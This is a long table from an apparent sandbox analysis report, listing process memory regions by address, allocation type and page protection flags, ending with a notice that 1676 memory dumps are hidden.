43E9000
|
heap
|
page read and write
|
||
|
4083000
|
heap
|
page read and write
|
||
|
7FE898F0000
|
trusted library allocation
|
page read and write
|
||
|
29A000
|
heap
|
page read and write
|
||
|
3AC8000
|
heap
|
page read and write
|
||
|
1AA48000
|
stack
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
4420000
|
heap
|
page read and write
|
||
|
347F000
|
heap
|
page read and write
|
||
|
13F850000
|
unkown
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
1CB0000
|
trusted library allocation
|
page read and write
|
||
|
2A73000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C46000
|
trusted library allocation
|
page read and write
|
||
|
4412000
|
heap
|
page read and write
|
||
|
283E000
|
stack
|
page read and write
|
||
|
16E000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
39B000
|
heap
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
406E000
|
heap
|
page read and write
|
||
|
34E000
|
heap
|
page read and write
|
||
|
38F0000
|
trusted library allocation
|
page read and write
|
||
|
13B000
|
heap
|
page read and write
|
||
|
7FE895D0000
|
trusted library allocation
|
page read and write
|
||
|
517E000
|
heap
|
page read and write
|
||
|
3AE000
|
heap
|
page read and write
|
||
|
7FE89570000
|
trusted library allocation
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
heap
|
page read and write
|
||
|
2B0F000
|
stack
|
page read and write
|
||
|
29A000
|
heap
|
page read and write
|
||
|
98000
|
heap
|
page read and write
|
||
|
412B000
|
heap
|
page read and write
|
||
|
296000
|
heap
|
page read and write
|
||
|
40DE000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
3C3000
|
heap
|
page read and write
|
||
|
43DD000
|
heap
|
page read and write
|
||
|
7FE899F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4183000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
3B53000
|
heap
|
page read and write
|
||
|
2BF0000
|
trusted library allocation
|
page read and write
|
||
|
43DD000
|
heap
|
page read and write
|
||
|
7FE8936D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C650000
|
heap
|
page read and write
|
||
|
43CB000
|
heap
|
page read and write
|
||
|
7FFFFF85000
|
trusted library allocation
|
page execute read
|
||
|
3400000
|
trusted library allocation
|
page read and write
|
||
|
3A92000
|
heap
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
47CF000
|
heap
|
page read and write
|
||
|
1B29F000
|
stack
|
page read and write
|
||
|
3AF1000
|
heap
|
page read and write
|
||
|
1A98C000
|
stack
|
page read and write
|
||
|
4076000
|
heap
|
page read and write
|
||
|
3B72000
|
heap
|
page read and write
|
||
|
2080000
|
heap
|
page execute and read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89520000
|
trusted library allocation
|
page execute and read and write
|
||
|
4355000
|
heap
|
page read and write
|
||
|
7FE89C80000
|
trusted library allocation
|
page read and write
|
||
|
540000
|
direct allocation
|
page read and write
|
||
|
402000
|
heap
|
page read and write
|
||
|
1A608000
|
stack
|
page read and write
|
||
|
115000
|
heap
|
page read and write
|
||
|
412E000
|
heap
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
1C4F7000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
7FE8941C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89C90000
|
trusted library allocation
|
page read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
3405000
|
trusted library allocation
|
page read and write
|
||
|
3B46000
|
heap
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
4355000
|
heap
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
4310000
|
heap
|
page read and write
|
||
|
7FE893BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
29E7000
|
trusted library allocation
|
page read and write
|
||
|
7FE89660000
|
trusted library allocation
|
page read and write
|
||
|
103000
|
heap
|
page read and write
|
||
|
29E7000
|
trusted library allocation
|
page read and write
|
||
|
33FF000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
2B6000
|
heap
|
page read and write
|
||
|
28A000
|
heap
|
page read and write
|
||
|
40CF000
|
heap
|
page read and write
|
||
|
1AB69000
|
stack
|
page read and write
|
||
|
308000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
173000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
2250000
|
heap
|
page read and write
|
||
|
276000
|
heap
|
page read and write
|
||
|
1B50000
|
heap
|
page read and write
|
||
|
3A4000
|
heap
|
page read and write
|
||
|
3CC0000
|
trusted library allocation
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
3A90000
|
heap
|
page read and write
|
||
|
44B1000
|
heap
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
43C8000
|
heap
|
page read and write
|
||
|
40DC000
|
heap
|
page read and write
|
||
|
1CA0000
|
direct allocation
|
page read and write
|
||
|
405E000
|
heap
|
page read and write
|
||
|
3A7F000
|
stack
|
page read and write
|
||
|
56DF000
|
heap
|
page read and write
|
||
|
3423000
|
direct allocation
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
7FE89A87000
|
trusted library allocation
|
page read and write
|
||
|
3224000
|
trusted library allocation
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
FC000
|
heap
|
page read and write
|
||
|
2A67000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
434000
|
heap
|
page read and write
|
||
|
4066000
|
heap
|
page read and write
|
||
|
4351000
|
heap
|
page read and write
|
||
|
51F4000
|
heap
|
page read and write
|
||
|
410F000
|
heap
|
page read and write
|
||
|
7FE89AB2000
|
trusted library allocation
|
page read and write
|
||
|
1A84A000
|
heap
|
page read and write
|
||
|
3B46000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
13F5F0000
|
unkown
|
page readonly
|
||
|
3417000
|
direct allocation
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
1C86F000
|
stack
|
page read and write
|
||
|
43E4000
|
heap
|
page read and write
|
||
|
43C8000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
5143000
|
heap
|
page read and write
|
||
|
431B000
|
heap
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
29A000
|
heap
|
page read and write
|
||
|
1B1BF000
|
stack
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
434C000
|
heap
|
page read and write
|
||
|
120000
|
heap
|
page read and write
|
||
|
1ADD4000
|
heap
|
page read and write
|
||
|
3B6C000
|
heap
|
page read and write
|
||
|
346D000
|
heap
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
43C8000
|
heap
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
44B1000
|
heap
|
page read and write
|
||
|
1B04F000
|
stack
|
page read and write
|
||
|
3E7000
|
heap
|
page read and write
|
||
|
3396000
|
heap
|
page read and write
|
||
|
2A88000
|
trusted library allocation
|
page read and write
|
||
|
568D000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
3E09000
|
heap
|
page read and write
|
||
|
35A4000
|
heap
|
page read and write
|
||
|
4187000
|
heap
|
page read and write
|
||
|
1B35B000
|
stack
|
page read and write
|
||
|
1D20000
|
direct allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A83000
|
trusted library allocation
|
page read and write
|
||
|
7FE89655000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4505000
|
heap
|
page read and write
|
||
|
210000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE89364000
|
trusted library allocation
|
page read and write
|
||
|
436000
|
heap
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
3CC9000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
1A690000
|
heap
|
page execute and read and write
|
||
|
402000
|
heap
|
page read and write
|
||
|
4485000
|
heap
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
2A8F000
|
trusted library allocation
|
page read and write
|
||
|
435D000
|
heap
|
page read and write
|
||
|
30CD000
|
trusted library allocation
|
page read and write
|
||
|
1CC3000
|
direct allocation
|
page read and write
|
||
|
132000
|
stack
|
page read and write
|
||
|
1CAAE000
|
stack
|
page read and write
|
||
|
4068000
|
heap
|
page read and write
|
||
|
55DC000
|
heap
|
page read and write
|
||
|
43DA000
|
heap
|
page read and write
|
||
|
7FE89AD4000
|
trusted library allocation
|
page read and write
|
||
|
43BF000
|
heap
|
page read and write
|
||
|
26CA000
|
trusted library allocation
|
page read and write
|
||
|
56BC000
|
heap
|
page read and write
|
||
|
1C41B000
|
heap
|
page read and write
|
||
|
4416000
|
heap
|
page read and write
|
||
|
347F000
|
heap
|
page read and write
|
||
|
1C533000
|
heap
|
page read and write
|
||
|
47C7000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
4114000
|
heap
|
page read and write
|
||
|
13FF0B000
|
unkown
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
2100000
|
heap
|
page read and write
|
||
|
4068000
|
heap
|
page read and write
|
||
|
47D1000
|
heap
|
page read and write
|
||
|
FA000
|
heap
|
page read and write
|
||
|
2104000
|
heap
|
page read and write
|
||
|
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
|
1CE0000
|
direct allocation
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
140037000
|
unkown
|
page read and write
|
||
|
13FDD0000
|
unkown
|
page readonly
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
434D000
|
heap
|
page read and write
|
||
|
2BDD000
|
trusted library allocation
|
page read and write
|
||
|
7FE89530000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
|
405E000
|
heap
|
page read and write
|
||
|
7F6000
|
heap
|
page read and write
|
||
|
3AB000
|
heap
|
page read and write
|
||
|
3AC8000
|
heap
|
page read and write
|
||
|
406E000
|
heap
|
page read and write
|
||
|
3CC5000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
4354000
|
heap
|
page read and write
|
||
|
12590000
|
trusted library allocation
|
page read and write
|
||
|
555A000
|
heap
|
page read and write
|
||
|
3A8F000
|
heap
|
page read and write
|
||
|
436000
|
heap
|
page read and write
|
||
|
30C0000
|
trusted library allocation
|
page read and write
|
||
|
3B46000
|
heap
|
page read and write
|
||
|
44B1000
|
heap
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
43E4000
|
heap
|
page read and write
|
||
|
7FE89410000
|
trusted library allocation
|
page read and write
|
||
|
40DC000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
29E9000
|
trusted library allocation
|
page read and write
|
||
|
5681000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
1C419000
|
heap
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
43E000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
431B000
|
heap
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
1C7EC000
|
stack
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
43C8000
|
heap
|
page read and write
|
||
|
43F3000
|
heap
|
page read and write
|
||
|
7FE89C4D000
|
trusted library allocation
|
page read and write
|
||
|
434D000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
4078000
|
heap
|
page read and write
|
||
|
7FE89564000
|
trusted library allocation
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
265000
|
heap
|
page read and write
|
||
|
2E85000
|
trusted library allocation
|
page read and write
|
||
|
1C6000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
289E000
|
stack
|
page read and write
|
||
|
2A72000
|
trusted library allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
5617000
|
heap
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
2A97000
|
trusted library allocation
|
page read and write
|
||
|
7FE898D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C2000
|
heap
|
page read and write
|
||
|
4314000
|
heap
|
page read and write
|
||
|
1A871000
|
heap
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
7FFFFF87000
|
trusted library allocation
|
page execute read
|
||
|
2A9A000
|
trusted library allocation
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
FF000
|
heap
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
5253000
|
heap
|
page read and write
|
||
|
1C455000
|
heap
|
page read and write
|
||
|
1FC3000
|
direct allocation
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
12596000
|
trusted library allocation
|
page read and write
|
||
|
51DD000
|
heap
|
page read and write
|
||
|
226000
|
heap
|
page read and write
|
||
|
43DF000
|
heap
|
page read and write
|
||
|
1B51B000
|
stack
|
page read and write
|
||
|
33CA000
|
stack
|
page read and write
|
||
|
4080000
|
heap
|
page read and write
|
||
|
3580000
|
trusted library allocation
|
page read and write
|
||
|
7FE89CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
4068000
|
heap
|
page read and write
|
||
|
313D000
|
stack
|
page read and write
|
||
|
43C8000
|
heap
|
page read and write
|
||
|
2E88000
|
trusted library allocation
|
page read and write
|
||
|
43F1000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
410F000
|
heap
|
page read and write
|
||
|
4487000
|
heap
|
page read and write
|
||
|
1A698000
|
heap
|
page execute and read and write
|
||
|
3423000
|
direct allocation
|
page read and write
|
||
|
44B1000
|
heap
|
page read and write
|
||
|
1C40A000
|
heap
|
page read and write
|
||
|
2AF5000
|
trusted library allocation
|
page read and write
|
||
|
412B000
|
heap
|
page read and write
|
||
|
2A90000
|
trusted library allocation
|
page read and write
|
||
|
4183000
|
heap
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
51A2000
|
heap
|
page read and write
|
||
|
7FFFFF80000
|
trusted library allocation
|
page readonly
|
||
|
44B1000
|
heap
|
page read and write
|
||
|
15F000
|
heap
|
page read and write
|
||
|
4485000
|
heap
|
page read and write
|
||
|
239A000
|
stack
|
page read and write
|
||
|
4037000
|
heap
|
page read and write
|
||
|
3B51000
|
heap
|
page read and write
|
||
|
4183000
|
heap
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
2A72000
|
trusted library allocation
|
page read and write
|
||
|
3454000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
3A90000
|
trusted library allocation
|
page read and write
|
||
|
2B6000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
338C000
|
heap
|
page read and write
|
||
|
1FB0000
|
direct allocation
|
page read and write
|
||
|
1CEF000
|
heap
|
page read and write
|
||
|
43E000
|
heap
|
page read and write
|
||
|
217F000
|
stack
|
page read and write
|
||
|
7FFFFF81000
|
trusted library allocation
|
page execute read
|
||
|
43DD000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
143000000
|
direct allocation
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
2240000
|
heap
|
page read and write
|
||
|
7FE89420000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A7DF000
|
stack
|
page read and write
|
||
|
21F0000
|
trusted library allocation
|
page execute read
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
4139000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
FBE000
|
stack
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
140400000
|
direct allocation
|
page read and write
|
||
|
239F000
|
stack
|
page read and write
|
||
|
1D94000
|
heap
|
page read and write
|
||
|
22F5000
|
heap
|
page read and write
|
||
|
2A6A000
|
trusted library allocation
|
page read and write
|
||
|
296A000
|
stack
|
page read and write
|
||
|
80000
|
direct allocation
|
page read and write
|
||
|
13FC00000
|
direct allocation
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
1A7FB000
|
heap
|
page read and write
|
||
|
1FC3000
|
direct allocation
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
3D60000
|
trusted library allocation
|
page read and write
|
||
|
7EE000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
339C000
|
heap
|
page read and write
|
||
|
13F85F000
|
unkown
|
page readonly
|
||
|
153000
|
heap
|
page read and write
|
||
|
1C414000
|
heap
|
page read and write
|
||
|
5218000
|
heap
|
page read and write
|
||
|
7FE898E0000
|
trusted library allocation
|
page read and write
|
||
|
412C000
|
heap
|
page read and write
|
||
|
7FE89670000
|
trusted library allocation
|
page read and write
|
||
|
347C000
|
heap
|
page read and write
|
||
|
39D000
|
heap
|
page read and write
|
||
|
3900000
|
trusted library allocation
|
page read and write
|
||
|
1B660000
|
heap
|
page read and write
|
||
|
4314000
|
heap
|
page read and write
|
||
|
372000
|
heap
|
page read and write
|
||
|
3AC8000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
40D1000
|
heap
|
page read and write
|
||
|
29E3000
|
trusted library allocation
|
page read and write
|
||
|
3D7000
|
heap
|
page read and write
|
||
|
25AC000
|
trusted library allocation
|
page read and write
|
||
|
412E000
|
heap
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
1C47C000
|
heap
|
page read and write
|
||
|
4415000
|
heap
|
page read and write
|
||
|
29EB000
|
trusted library allocation
|
page read and write
|
||
|
563A000
|
heap
|
page read and write
|
||
|
2A93000
|
trusted library allocation
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
1A6B8000
|
heap
|
page execute and read and write
|
||
|
3D60000
|
trusted library allocation
|
page read and write
|
||
|
2B29000
|
trusted library allocation
|
page read and write
|
||
|
3AB000
|
heap
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
7FE89BED000
|
trusted library allocation
|
page read and write
|
||
|
4116000
|
heap
|
page read and write
|
||
|
29E9000
|
trusted library allocation
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
44B3000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
7FE895F0000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
412C000
|
heap
|
page read and write
|
||
|
4416000
|
heap
|
page read and write
|
||
|
40CD000
|
heap
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
1DFF000
|
stack
|
page read and write
|
||
|
7FE89480000
|
trusted library allocation
|
page execute and read and write
|
||
|
4342000
|
heap
|
page read and write
|
||
|
3053000
|
heap
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
304000
|
heap
|
page read and write
|
||
|
29F3000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page execute
|
||
|
1C2B3000
|
heap
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
29A000
|
heap
|
page read and write
|
||
|
1C74B000
|
stack
|
page read and write
|
||
|
4021000
|
heap
|
page read and write
|
||
|
1EE000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2623000
|
trusted library allocation
|
page read and write
|
||
|
7FE895C0000
|
trusted library allocation
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
51B9000
|
heap
|
page read and write
|
||
|
3B68000
|
heap
|
page read and write
|
||
|
7FE899B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
5507000
|
heap
|
page read and write
|
||
|
5200000
|
heap
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
410F000
|
heap
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
2A63000
|
trusted library allocation
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
1C155000
|
heap
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
3AB0000
|
trusted library allocation
|
page read and write
|
||
|
4080000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
5120000
|
heap
|
page read and write
|
||
|
2BD3000
|
trusted library allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
14003F000
|
unkown
|
page readonly
|
||
|
296000
|
heap
|
page read and write
|
||
|
13F5F0000
|
unkown
|
page readonly
|
||
|
422000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89580000
|
trusted library allocation
|
page read and write
|
||
|
410A000
|
heap
|
page read and write
|
||
|
1CC9000
|
heap
|
page read and write
|
||
|
365000
|
heap
|
page read and write
|
||
|
3A90000
|
trusted library allocation
|
page read and write
|
||
|
2A88000
|
trusted library allocation
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page execute
|
||
|
281000
|
heap
|
page read and write
|
||
|
4CE000
|
heap
|
page read and write
|
||
|
7FE895A0000
|
trusted library allocation
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
43E4000
|
heap
|
page read and write
|
||
|
1C04C000
|
stack
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
496000
|
heap
|
page read and write
|
||
|
403A000
|
heap
|
page read and write
|
There are 1676 hidden memdumps, click here to show them.